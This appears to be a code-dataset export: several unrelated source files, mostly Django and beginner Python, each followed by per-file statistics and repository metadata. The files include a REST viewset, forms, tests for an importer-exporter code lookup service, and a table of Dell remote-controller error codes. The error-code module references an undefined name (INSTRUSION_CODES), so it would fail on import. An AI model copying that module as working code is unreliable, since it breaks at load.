from django.contrib.auth.models import Group, Permission from rest_framework.response import Response from rest_framework.viewsets import ModelViewSet from .statistical import UserPagination from apps.meiduo_admin.serializer.user_group import UserGroupSerializer, GroupPerSerializer class UserGroupView(ModelViewSet): serializer_class = UserGroupSerializer queryset = Group.objects.all() pagination_class = UserPagination def simple(self,request): data = Permission.objects.all() ser = GroupPerSerializer(data,many=True) return Response(ser.data)
32.833333
91
0.788494
64
591
7.1875
0.578125
0.034783
0.073913
0
0
0
0
0
0
0
0
0
0.147208
591
18
92
32.833333
0.912698
0
0
0
0
0
0
0
0
0
0
0
0
1
0.076923
false
0
0.384615
0
0.846154
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
55948a0d8acfcbe1f96f58b36c1bb83505bd04f6
175
py
Python
first_task.py
yashika0607/Task1_python
4a867227f48f0c8ed9ad418fb412550eef3a7571
[ "Apache-2.0" ]
null
null
null
first_task.py
yashika0607/Task1_python
4a867227f48f0c8ed9ad418fb412550eef3a7571
[ "Apache-2.0" ]
null
null
null
first_task.py
yashika0607/Task1_python
4a867227f48f0c8ed9ad418fb412550eef3a7571
[ "Apache-2.0" ]
null
null
null
#task 1 r=float(input("Enter the radius of the circle?\n")) pi=3.143 area=pi*r*r print("Area of the circle is ",area) #task 2 x=input("Enter the file name\n") print(x+".py")
17.5
51
0.674286
38
175
3.105263
0.578947
0.169492
0.220339
0
0
0
0
0
0
0
0
0.039735
0.137143
175
9
52
19.444444
0.741722
0.068571
0
0
0
0
0.490683
0
0
0
0
0
0
1
0
false
0
0
0
0
0.333333
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
55a528f7f755e76f01a1fec6c18655befd899209
131
py
Python
Logon.py
fenglihanxiao/multi_test
46ee84aaa36f1d9594ccf7a14caa167dfcd719d5
[ "MIT" ]
null
null
null
Logon.py
fenglihanxiao/multi_test
46ee84aaa36f1d9594ccf7a14caa167dfcd719d5
[ "MIT" ]
null
null
null
Logon.py
fenglihanxiao/multi_test
46ee84aaa36f1d9594ccf7a14caa167dfcd719d5
[ "MIT" ]
null
null
null
num1 = 1 num2 = 20 num3 = 168 # dev first commit num1 = 1 # resolve conflict num2 = 88888888 # Test next commit num3 = 99
8.1875
18
0.641221
20
131
4.2
0.75
0.119048
0
0
0
0
0
0
0
0
0
0.247312
0.290076
131
15
19
8.733333
0.655914
0.381679
0
0.333333
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
55a57c64b93ff64ee4143c416e8510e88ce162fa
8,022
py
Python
foulacces.py
Danukeru/FOULACCES
54304c7a91326f9517c45f6981c4ab8de4eb3964
[ "BSD-3-Clause" ]
1
2019-10-21T23:43:21.000Z
2019-10-21T23:43:21.000Z
foulacces.py
Danukeru/FOULACCES
54304c7a91326f9517c45f6981c4ab8de4eb3964
[ "BSD-3-Clause" ]
null
null
null
foulacces.py
Danukeru/FOULACCES
54304c7a91326f9517c45f6981c4ab8de4eb3964
[ "BSD-3-Clause" ]
1
2019-10-21T23:43:29.000Z
2019-10-21T23:43:29.000Z
#!/usr/bin/env python import os import sys import hashlib import httplib import base64 import socket from xml.dom.minidom import * RAC_CODE = { 'x' : 'Unknown error', '0x0' : 'Success', '0x4' : 'Number of arguments does not match', '0xc' : 'Syntax error in xml2cli command', '0x408' : 'Session Timeout', '0x43' : 'No such subfunction', '0x62' : 'Command not supported on this platform for this firmware', '0xb0002' : 'Invalid handle', '0x140000' : 'Too many sessions', '0x140002' : 'Logout', '0x140004' : 'Invalid password', '0x140005' : 'Invalid username', '0x150008' : 'Too many requests', '0x15000a' : 'No such event', '0x15000c' : 'No such function', '0x15000d' : 'Unimplemented', '0x170003' : 'Missing content in POST ?', '0x170007' : 'Dont know yet', '0x1a0004' : 'Invalid sensorname', '0x10150006' : 'Unknown sensor error', '0x10150009' : 'Too many sensors in sensorlist', '0x20308' : 'Console not available', '0x30003' : 'Console not active', '0x3000a' : 'Console is in text mode', '0x3000b' : 'Console is in VGA graphic mode', '0x30011' : [ 'Console is in Linux mode (no ctrl+alt+del)', 'Console is in Windows or Netware mode' ], '0xe0003' : 'Unknown serveraction', '0xf0001' : 'Offset exceeds number of entries in eventlog', '0xf0003' : 'Request exceeds number of entries in eventlog', '0xf0004' : 'Invalid number of events requested' } SEVERITY = { 'x' : 'Unknown severity. ', '' : '-', '0x1' : 'Unknown', '0x2' : 'OK', '0x3' : 'Information', '0x4' : 'Recoverable', '0x5' : 'Non-Critical', '0x6' : 'Critical', '0x7' : 'Non-Recoverable', } BOGUS_IDS_1650 = [ '0x1010018', '0x1020010', '0x1020018', '0x1020062', '0x1030010', '0x1030018', '0x1030062', '0x1040010', '0x1040018', '0x1050018', '0x1060010', '0x1060018', '0x1060062', '0x1070018', '0x1070062', '0x1080010', '0x1080062', '0x1090010', '0x10a0010', '0x10f0062', '0x1100010', '0x1110010', '0x1120010', '0x1120062', '0x1130010', '0x1140010', '0x1150010', '0x13b0010', '0x13c0010', '0x13f0010', '0x14b0010', '0x14d0010', '0x20e0062', '0x2110062', '0x2160061', '0x2160062', '0x2170061', '0x2170062', '0x2180061', '0x2180062', '0x2190061', '0x2190062', '0x21a0061', '0x21a0062', '0x21b0061', '0x21b0062', '0x21e0010', '0x21e0061', '0x21e0062', '0x21f0061', '0x21f0062', '0x2210010', '0x2220010', '0x2230010', '0x2240010', '0x2250010', '0x2260010', '0x2270010', '0x2280010', '0x2290010', '0x22a0010', '0x22b0010', '0x22c0010', '0x22d0010', '0x22e0010', '0x22f0010', '0x2300010', '0x2310010', '0x2320010', '0x2330010', '0x2340010', '0x2350010', '0x2360010', '0x2370010', '0x2380010', '0x2390010', '0x23a0010', '0x23e0010', '0x2410010', '0x2420010', '0x2430010', '0x2440010', '0x2450010', '0x2460010', '0x2470010', '0x2480010', '0x2530010', ] BOGUS_IDS_2650 = [ '0x1350010', '0x1360010', '0x2160061', '0x2170061', '0x2180061', '0x2190061', '0x21a0061', '0x21b0061', '0x21c0061', '0x21d0061', '0x21e0060', '0x21e0061', '0x21f0060', '0x21f0061', '0x2d00010', ] BOGUS_IDS_1750 = [ '0x1060062', '0x1070062', '0x1080062', '0x10f0062', '0x1120062', '0x1030062', '0x1020062', '0x20e0062', '0x2110062', '0x2160062', '0x2170062', '0x2180062', '0x2190062', '0x21a0062', '0x21b0062', '0x21f0062', '0x21e0062', '0x2160061', '0x2170061', '0x2180061', '0x2190061', '0x21a0061', '0x21b0061', '0x21f0061', '0x21e0061', '0x1010010', '0x1020010', '0x1030010', '0x1040010', '0x1080010', '0x1090010', '0x10a0010', '0x1100010', '0x1110010', '0x1120010', '0x1130010', '0x1140010', '0x1150010', '0x21e0010', '0x2210010', '0x2220010', '0x2230010', '0x2240010', '0x2250010', '0x2260010', '0x2290010', '0x22a0010', '0x22b0010', '0x22c0010', '0x22d0010', '0x22e0010', '0x22f0010', '0x2300010', '0x2310010', '0x2320010', '0x2330010', '0x2340010', '0x2350010', '0x2360010', '0x2370010', '0x2380010', '0x2390010', '0x23a0010', '0x13b0010', '0x13c0010', '0x13f0010', '0x2440010', '0x2450010', '0x2460010', '0x2470010', '0x2480010', '0x14a0010', '0x14d0010', '0x14e0010', '0x1500010', '0x1510010', '0x2000010', '0x2570010', '0x10f0060', '0x1120060', '0x1020060', '0x1010018', '0x1020018', '0x1030018', '0x1040018', '0x1050018', '0x1060018', '0x1070018', ] PROPNAMES = [ 'NAME', 'SEVERITY', 'LOW_CRITICAL', 'LOW_NON_CRITICAL', 'VAL', 'UNITS', 'UPPER_NON_CRITICAL', 'UPPER_CRITICAL', 'SENSOR_TYPE', ] DRIVE_SLOT_CODES = { '0' : 'Good', '1' : 'No Error', '2' : 'Faulty Drive', '4' : 'Drive Rebuilding', '8' : 'Drive In Failed Array', '16' : 'Drive In Critical Array', '32' : 'Parity Check Error', '64' : 'Predicted Error', '128' : 'No Drive', } POWER_UNIT_CODES = { '0' : 'AC Power Unit', '1' : 'DC Power Unit', } BUTTON_CODES = { '0' : 'Power Button Disabled', '1' : 'Power Button Enabled' } FAN_CONTROL_CODES = { '0' : 'Normal Operation', '1' : 'Unknown', } INTRUSION_CODES = { '0' : 'No Intrusion', '1' : 'Cover Intrusion Detected', '2' : 'Bezel Intrusion Detected', } POWER_SUPPLY_CODES = { '1' : 'Good', '2' : 'Failure Detected', '4' : 'Failure Predicted', '8' : 'Power Lost', '16' : 'Not Present', } PROCESSOR_CODES = { '1' : 'Good', '2' : 'Failure Detected', '4' : 'Failure Predicted', '8' : 'Power Lost', '16' : 'Not Present', } CODES = { 'button' : BUTTON_CODES, 'drive slot' : DRIVE_SLOT_CODES, 'fan control' : FAN_CONTROL_CODES, 'intrusion' : INSTRUSION_CODES, 'power supply' : POWER_SUPPLY_CODES, 'power unit' : POWER_UNIT_CODES, 'processor' : PROCESSOR_CODES, }
40.11
87
0.446771
547
8,022
6.486289
0.521024
0.008455
0.012401
0.012401
0.232244
0.206877
0.127959
0.127959
0.127959
0.127959
0
0.360154
0.417477
8,022
199
88
40.311558
0.399101
0.002493
0
0.106509
0
0
0.415573
0
0
0
0.241345
0
0
1
0
false
0.005917
0.04142
0
0.04142
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
55bbcfb0657fa9d696e2cb0dec828c20a4c0e1c7
156
py
Python
rpi/LiDAR.py
shadowsburney/LiDAR
f88cca9fbdae2d0dbe47a6e06cd965a2aaa82a0a
[ "MIT" ]
null
null
null
rpi/LiDAR.py
shadowsburney/LiDAR
f88cca9fbdae2d0dbe47a6e06cd965a2aaa82a0a
[ "MIT" ]
null
null
null
rpi/LiDAR.py
shadowsburney/LiDAR
f88cca9fbdae2d0dbe47a6e06cd965a2aaa82a0a
[ "MIT" ]
null
null
null
from sensor import Sensor from stepper import Stepper sensor = Sensor() stepper = Stepper(100) #stepper.start() while True: print(sensor.measure())
13
27
0.730769
20
156
5.7
0.5
0
0
0
0
0
0
0
0
0
0
0.023077
0.166667
156
11
28
14.181818
0.853846
0.096154
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0.166667
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
55c0c3ecc4384f35e0ec61e90038c58f6fa656b9
89
py
Python
languages/116/examples/test_problem.py
c3333/sphereengine-languages
ef76cbffe67407d88519ba1e4bfaa20e3a55ccff
[ "Apache-2.0" ]
5
2019-05-05T15:47:24.000Z
2021-07-22T14:29:13.000Z
languages/116/examples/test_problem.py
c3333/sphereengine-languages
ef76cbffe67407d88519ba1e4bfaa20e3a55ccff
[ "Apache-2.0" ]
1
2022-03-29T14:20:04.000Z
2022-03-29T14:20:04.000Z
languages/116/examples/test_problem.py
c3333/sphereengine-languages
ef76cbffe67407d88519ba1e4bfaa20e3a55ccff
[ "Apache-2.0" ]
4
2020-02-25T14:30:43.000Z
2021-05-12T10:05:05.000Z
from sys import stdin for line in stdin: n = int(line) if n == 42: break print(n)
9.888889
21
0.629213
17
89
3.294118
0.764706
0
0
0
0
0
0
0
0
0
0
0.030769
0.269663
89
8
22
11.125
0.830769
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.166667
0
0.166667
0.166667
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e96b8708dc8be78814c697d042595105e2d873c2
80
py
Python
Getting_Started_With_Raspberry_Pi_Pico/variable/code.py
gamblor21/Adafruit_Learning_System_Guides
f5dab4a758bc82d0bfc3c299683fe89dc093912a
[ "MIT" ]
665
2017-09-27T21:20:14.000Z
2022-03-31T09:09:25.000Z
Getting_Started_With_Raspberry_Pi_Pico/variable/code.py
gamblor21/Adafruit_Learning_System_Guides
f5dab4a758bc82d0bfc3c299683fe89dc093912a
[ "MIT" ]
641
2017-10-03T19:46:37.000Z
2022-03-30T18:28:46.000Z
Getting_Started_With_Raspberry_Pi_Pico/variable/code.py
gamblor21/Adafruit_Learning_System_Guides
f5dab4a758bc82d0bfc3c299683fe89dc093912a
[ "MIT" ]
734
2017-10-02T22:47:38.000Z
2022-03-30T14:03:51.000Z
"""Example of assigning a variable.""" user_name = input("What is your name? ")
26.666667
40
0.6875
12
80
4.5
0.916667
0
0
0
0
0
0
0
0
0
0
0
0.15
80
2
41
40
0.794118
0.4
0
0
0
0
0.452381
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e96f7f5812e754a8c8dec16943815bc6604a8f49
216
py
Python
rxkcd/models.py
aeternalis1/Relevant-XKCD
a9145974453b94ecf77a587b83bd69d974f14380
[ "MIT" ]
null
null
null
rxkcd/models.py
aeternalis1/Relevant-XKCD
a9145974453b94ecf77a587b83bd69d974f14380
[ "MIT" ]
null
null
null
rxkcd/models.py
aeternalis1/Relevant-XKCD
a9145974453b94ecf77a587b83bd69d974f14380
[ "MIT" ]
null
null
null
class Comic: def __init__(self, comic_num): self.id = comic_num self.title = "" self.title_text = "" self.transcript = "" self.explanation = "" self.img_url = "" self.og_title = "" self.og_ttext = ""
21.6
31
0.62963
29
216
4.344828
0.517241
0.126984
0.190476
0
0
0
0
0
0
0
0
0
0.208333
216
10
32
21.6
0.736842
0
0
0
0
0
0
0
0
0
0
0
0
1
0.1
false
0
0
0
0.2
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e96ffd9e458abb20cec71135158a8cf1ce09e9d1
888
py
Python
ElevatorBot/commands/funStuff/ticTacToe/vsAI.py
LukasSchmid97/destinyBloodoakStats
1420802ce01c3435ad5c283f44eb4531d9b22c38
[ "MIT" ]
3
2019-10-19T11:24:50.000Z
2021-01-29T12:02:17.000Z
ElevatorBot/commands/funStuff/ticTacToe/vsAI.py
LukasSchmid97/destinyBloodoakStats
1420802ce01c3435ad5c283f44eb4531d9b22c38
[ "MIT" ]
29
2019-10-14T12:26:10.000Z
2021-07-28T20:50:29.000Z
ElevatorBot/commands/funStuff/ticTacToe/vsAI.py
LukasSchmid97/destinyBloodoakStats
1420802ce01c3435ad5c283f44eb4531d9b22c38
[ "MIT" ]
2
2019-10-13T17:11:09.000Z
2020-05-13T15:29:04.000Z
# from discord.ext.commands import Cog # from discord_slash import SlashContext, cog_ext # from discord_slash.utils.manage_commands import create_option # # # class TicTacToeAI(Cog): # def __init__(self, client): # self.client = client # # @cog_ext.cog_subcommand( # base="tictactoe", # base_description="You know and love it - TicTacToe", # name="computer", # description="Try to beat me in a tic tac toe game", # options=[ # create_option( # name="easy_mode", # description="Set this to true if you are too weak for the normal mode", # option_type=5, # required=False, # ), # ], # ) # async def _tictactoe_ai(self, ctx: SlashContext, easy_mode: bool = False): # pass # # # def setup(client): # TicTacToeAI(client)
29.6
89
0.581081
101
888
4.930693
0.613861
0.066265
0.064257
0
0
0
0
0
0
0
0
0.001634
0.310811
888
29
90
30.62069
0.812092
0.933559
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
2
e988aca86693a630d0af6b4768506c2e555391e5
71
py
Python
Atividade do Livro-Nilo Ney(PYTHON)/Cap.03/exe 3.13.py
EduardoJonathan0/Python
0e4dff4703515a6454ba25c6f401960b6155f32f
[ "MIT" ]
null
null
null
Atividade do Livro-Nilo Ney(PYTHON)/Cap.03/exe 3.13.py
EduardoJonathan0/Python
0e4dff4703515a6454ba25c6f401960b6155f32f
[ "MIT" ]
null
null
null
Atividade do Livro-Nilo Ney(PYTHON)/Cap.03/exe 3.13.py
EduardoJonathan0/Python
0e4dff4703515a6454ba25c6f401960b6155f32f
[ "MIT" ]
null
null
null
C = int(input("Insira um valor: ")) Fire = (9 * C / 5) + 32 print(Fire)
23.666667
35
0.56338
13
71
3.076923
0.846154
0
0
0
0
0
0
0
0
0
0
0.071429
0.211268
71
3
36
23.666667
0.642857
0
0
0
0
0
0.236111
0
0
0
0
0
0
1
0
false
0
0
0
0
0.333333
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e98f3c0cbfe695e09cf6acaf634dcaef0d39ab20
965
py
Python
backend/forms.py
adarshrao1/Flood_detection
4a2a7ecef178366700d5c29a13d45143eaa7cc54
[ "CC0-1.0" ]
null
null
null
backend/forms.py
adarshrao1/Flood_detection
4a2a7ecef178366700d5c29a13d45143eaa7cc54
[ "CC0-1.0" ]
null
null
null
backend/forms.py
adarshrao1/Flood_detection
4a2a7ecef178366700d5c29a13d45143eaa7cc54
[ "CC0-1.0" ]
5
2021-06-05T14:11:04.000Z
2021-06-19T05:51:56.000Z
from django.forms import ModelForm from backend.models import Image, Image2 from django.contrib.auth.forms import UserCreationForm from django.contrib.auth.models import User from django import forms class CreateUserForm(UserCreationForm): email = forms.EmailField( widget=forms.TextInput(attrs={'class': 'form-control', }), ) username = forms.CharField( widget=forms.TextInput(attrs={'class': 'form-control', }), ) password1 = forms.CharField( widget=forms.PasswordInput(attrs={'class': 'form-control', }), ) password2 = forms.CharField( widget=forms.PasswordInput(attrs={'class': 'form-control', }), ) class Meta: model = User fields = ['username', 'email', 'password1', 'password2'] class ImageForm(ModelForm): class Meta: model = Image fields = "__all__" class ImageForm2(ModelForm): class Meta: model = Image2 fields = "__all__"
26.081081
70
0.654922
99
965
6.30303
0.333333
0.064103
0.089744
0.134615
0.320513
0.320513
0.320513
0.189103
0.189103
0
0
0.009309
0.220725
965
36
71
26.805556
0.820479
0
0
0.310345
0
0
0.117098
0
0
0
0
0
0
1
0
false
0.172414
0.172414
0
0.517241
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
e9a7d2f66b4f8dbaa2eb22e345ef51c2d6c7fe14
2,360
py
Python
src/Line.py
npanuhin/BIOCAD-BWA
50f56fd7d08b8ad1247934c902fb137f3c28cdf8
[ "MIT" ]
null
null
null
src/Line.py
npanuhin/BIOCAD-BWA
50f56fd7d08b8ad1247934c902fb137f3c28cdf8
[ "MIT" ]
null
null
null
src/Line.py
npanuhin/BIOCAD-BWA
50f56fd7d08b8ad1247934c902fb137f3c28cdf8
[ "MIT" ]
null
null
null
from typing import List from collections import deque class Line: """ Properties: start_x {0} start_y {1} end_x {2} end_y {3} dots = [dot1, ..., dotN] {4} coords = (start_x, start_y, end_x, end_y) """ def __init__(self, start_x=None, start_y=None, end_x=None, end_y=None, dots=[]): self.start_x = start_x self.start_y = start_y self.end_x = end_x self.end_y = end_y self.dots = dots def __repr__(self): return "Line(start_x={}, start_y={}, end_x={}, end_y={}, dots=[{}])".format( self.start_x, self.start_y, self.end_x, self.end_y, len(self.dots) ) @property def coords(self): return self.start_x, self.start_y, self.end_x, self.end_y # @property # def x1(self): # return self.start_x # @property # def y1(self): # return self.start_y # @property # def x2(self): # return self.end_x # @property # def y2(self): # return self.end_y @property def center_x(self): return (self.start_x + self.end_x) // 2 @property def center_y(self): return (self.start_y + self.end_y) // 2 def isTiltedCorrectly(self): return self.start_y <= self.end_y @property def k(self): return (self.end_y - self.start_y) / (self.end_x - self.start_x) @property def b(self): return self.end_y - self.end_x * self.k def copyCoords(self): return Line(self.start_x, self.start_y, self.end_x, self.end_y, dots=[]) def shift(self, dx=0, dy=0): self.start_x += dx self.start_y += dy self.end_x += dx self.end_y += dy for i in range(len(self.dots)): self.dots[i][0] += dx self.dots[i][1] += dy def rotateY(self, rotation_center, line=True, dots=False): if line: self.start_y -= (self.start_y - rotation_center) * 2 self.end_y -= (self.end_y - rotation_center) * 2 if dots: for i in range(len(self.dots)): self.dots[i][1] -= (self.dots[i][1] - rotation_center) * 2 def shiftLines(lines, count) -> List[Line]: result = deque(lines) for _ in range(count): result.append(result.popleft()) return list(result)
25.106383
84
0.555932
347
2,360
3.564842
0.167147
0.118836
0.077607
0.073565
0.44139
0.292643
0.232821
0.215036
0.137429
0.137429
0
0.012868
0.308475
2,360
93
85
25.376344
0.745098
0.147034
0
0.134615
0
0
0.030071
0
0
0
0
0
0
1
0.230769
false
0
0.038462
0.153846
0.461538
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
e9bd8c135bbdae40ce2ed51669ba9beb880235de
561
py
Python
typeidea/comment/adminx.py
LastDanceG/typeblog
fdd043546813866669c004bc8d8aedbfcfa326f2
[ "MIT" ]
1
2020-02-20T12:01:43.000Z
2020-02-20T12:01:43.000Z
typeidea/comment/adminx.py
LastDanceG/typeblog
fdd043546813866669c004bc8d8aedbfcfa326f2
[ "MIT" ]
2
2020-06-06T00:45:15.000Z
2021-06-10T22:35:31.000Z
typeidea/comment/adminx.py
LastDanceG/typeblog
fdd043546813866669c004bc8d8aedbfcfa326f2
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from __future__ import unicode_literals import xadmin from django.contrib import admin # from typeidea.custom_site import custom_site from typeidea.custom_admin import BaseOwnerAdmin from .models import Comment # Register your models here. class CommentAdmin(object): list_display = ['target', 'nickname', 'status', 'website', 'email', 'create_time'] search_fields = ['nickname', 'status'] actions_on_top = True actions_on_bottom = True date_hierarchy = 'create_time' xadmin.site.register(Comment, CommentAdmin)
26.714286
86
0.750446
69
561
5.855072
0.608696
0.059406
0.089109
0
0
0
0
0
0
0
0
0.002092
0.14795
561
21
87
26.714286
0.843096
0.165775
0
0
0
0
0.146237
0
0
0
0
0
0
1
0
false
0
0.416667
0
0.916667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
e9da66e1d85822aa027c49a94455e58540701de1
7,156
py
Python
iec/iec_lookup/tests/test_integration_services.py
divinedeveloper/iec-web-service
0d5e7a05356cc8d88372a559bd5df787d8dc1f75
[ "MIT" ]
null
null
null
iec/iec_lookup/tests/test_integration_services.py
divinedeveloper/iec-web-service
0d5e7a05356cc8d88372a559bd5df787d8dc1f75
[ "MIT" ]
null
null
null
iec/iec_lookup/tests/test_integration_services.py
divinedeveloper/iec-web-service
0d5e7a05356cc8d88372a559bd5df787d8dc1f75
[ "MIT" ]
null
null
null
from iec_lookup.services.iec_lookup_service import IECLookupService from iec_lookup.tests.fixtures import mongo_test_db_setup, importer_exporter_code_details_as_json, importer_exporter_code_details_as_object, dgft_succes_response_html_string, dgft_error_response_html_string, iec_table_section_list, basic_iec_details_as_object, dgft_error_message # from bs4 import BeautifulSoup, NavigableString, Tag import bs4 from iec_lookup.models import ImporterExporterCodeDetails, Director, Branch, RegistrationDetails, RegistrationCumMembershipCertificateDetails, ImporterExporterCodeToBeRetrieved from iec_lookup.custom_exceptions import CustomApiException from django.conf import settings from rest_framework import status from collections import OrderedDict import mock from mock import MagicMock import mongoengine import pytest from iec_lookup import utils from pprint import pprint from pytest_mock import mocker import mongomock import requests import json import logging # Create your tests here. # Feature: To be able to do something # In order to do something # As someone # I want the system to do this thing # Scenario: A sample one # Given this situation # When I do something # Then what I get is what I was expecting for @pytest.mark.integrationtest @pytest.mark.usefixtures('mongo_test_db_setup') class TestIntegrationIecLookupService: def setup_method(self): """ Initial data setup """ self.request_json = {'code': "1198002743",'name': "CAP"} self.non_existing_iec_json = {'code': "1298001743",'name': "PAC"} self.iec_lookup_service = IECLookupService() @pytest.mark.xfail(raises= requests.exceptions.ConnectionError, reason="DGFT site down") def test_integration_check_dgft_site_down(self): """ This method will tests poll_dgft_site_with_iec_and_name method in service check if dgft site is down and get ERROR assert message is ERROR then site is down else not """ dgft_site_response = self.iec_lookup_service.poll_dgft_site_with_iec_and_name(self.request_json) assert dgft_site_response != "ERROR" def test_integration_save_complete_iec_details(self, basic_iec_details_as_object, importer_exporter_code_details_as_object): """ This method will tests save_complete_iec_details method in service get all data and save in iec details document assert data is persisted """ saved_iec_details = self.iec_lookup_service.save_complete_iec_details(basic_iec_details_as_object, importer_exporter_code_details_as_object.directors,importer_exporter_code_details_as_object.branches, importer_exporter_code_details_as_object.registration_details,importer_exporter_code_details_as_object.rcmc_details) mongo_test_db_setup.document_id = saved_iec_details.id assert saved_iec_details.importer_exporter_code == basic_iec_details_as_object.importer_exporter_code assert basic_iec_details_as_object.party_name in saved_iec_details.party_name assert saved_iec_details.exporter_type != "" or None assert saved_iec_details.importer_exporter_code_status != "" or None assert saved_iec_details.nature_of_concern != "" or None def test_integration_get_iec_with_code_and_name(self): """ This method will tests get_iec_with_code_and_name method in service to check if dgft site is up and get data assert data is returned as per request """ importer_exporter_code_details = self.iec_lookup_service.get_iec_with_code_and_name(self.request_json) assert importer_exporter_code_details.id == mongo_test_db_setup.document_id assert importer_exporter_code_details.importer_exporter_code == self.request_json['code'] assert self.request_json['name'] in importer_exporter_code_details.party_name assert importer_exporter_code_details.exporter_type != "" or None assert importer_exporter_code_details.importer_exporter_code_status != "" or None assert importer_exporter_code_details.nature_of_concern != "" or None def test_integration_iec_with_code_and_name_not_in_db(self): """ This method will tests get_iec_with_code_and_name method in service to check if iec data is available in db assert none is returned """ importer_exporter_code_details = self.iec_lookup_service.get_iec_with_code_and_name(self.non_existing_iec_json) assert importer_exporter_code_details == None def test_integration_save_iec_to_retrieve_data(self): """ This method will tests get_or_save_iec_to_retrieve_data method in service to check if dgft site is down save iec code and name to fetch data later assert iec to be retrieved is persisted """ importer_exporter_code_to_retrieve = self.iec_lookup_service.get_or_save_iec_to_retrieve_data(self.non_existing_iec_json) mongo_test_db_setup.document_id = importer_exporter_code_to_retrieve.id assert importer_exporter_code_to_retrieve.importer_exporter_code == self.non_existing_iec_json['code'] assert self.non_existing_iec_json['name'] == importer_exporter_code_to_retrieve.name assert importer_exporter_code_to_retrieve.is_iec_data_retrieved == False def test_integration_get_iec_to_retrieve_data(self): """ This method will tests get_or_save_iec_to_retrieve_data method in service to check if dgft site is down fetch iec code and name from iec to be retrieved assert iec to be retrieved exists """ importer_exporter_code_to_retrieve = self.iec_lookup_service.get_or_save_iec_to_retrieve_data(self.non_existing_iec_json) assert importer_exporter_code_to_retrieve.id == mongo_test_db_setup.document_id assert importer_exporter_code_to_retrieve != None def test_integration_no_iec_with_code_and_name_in_db(self): """ This method will tests get_iec_with_code_and_name method in service to check if dgft site is up and get data assert data is returned as per request """ importer_exporter_code_details = self.iec_lookup_service.get_iec_with_code_and_name(self.non_existing_iec_json) assert importer_exporter_code_details == None def test_integration_retrieve_iec_data_with_code(self): """ This method will tests retrieve_iec_data_with_code method in service to check if iec data is present in db assert data is returned as per iec code """ importer_exporter_code_details = self.iec_lookup_service.retrieve_iec_data_with_code(self.request_json['code']) assert importer_exporter_code_details.importer_exporter_code == self.request_json['code'] assert self.request_json['name'] in importer_exporter_code_details.party_name assert importer_exporter_code_details.exporter_type != "" or None assert importer_exporter_code_details.importer_exporter_code_status != "" or None assert importer_exporter_code_details.nature_of_concern != "" or None def test_integration_not_found_retrieve_iec_data_with_code(self): """ This method will tests retrieve_iec_data_with_code method in service assert iec not found exception is raised """ with pytest.raises(CustomApiException) as exc_info: self.iec_lookup_service.retrieve_iec_data_with_code(self.non_existing_iec_json['code']) def teardown_method(self): """ Set values to none """ self.request_json = None self.non_existing_iec_json = None self.iec_lookup_service = None
42.595238
279
0.827138
1,083
7,156
5.051708
0.154201
0.11698
0.146226
0.118443
0.623286
0.564979
0.481448
0.439773
0.418753
0.400658
0
0.003486
0.118083
7,156
167
280
42.850299
0.863413
0.23938
0
0.205128
0
0
0.021228
0
0
0
0
0
0.307692
1
0.141026
false
0
0.628205
0
0.782051
0.012821
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
7578054f5e5fa0cd2bf6c67b5dfd6c6a49acba24
563
py
Python
posts/migrations/0002_auto_20181129_2311.py
ddeveloper72/Dhjango-Blog
8f9771a149a944e32aa192de97ab69092a1492d2
[ "CC-BY-3.0" ]
null
null
null
posts/migrations/0002_auto_20181129_2311.py
ddeveloper72/Dhjango-Blog
8f9771a149a944e32aa192de97ab69092a1492d2
[ "CC-BY-3.0" ]
null
null
null
posts/migrations/0002_auto_20181129_2311.py
ddeveloper72/Dhjango-Blog
8f9771a149a944e32aa192de97ab69092a1492d2
[ "CC-BY-3.0" ]
null
null
null
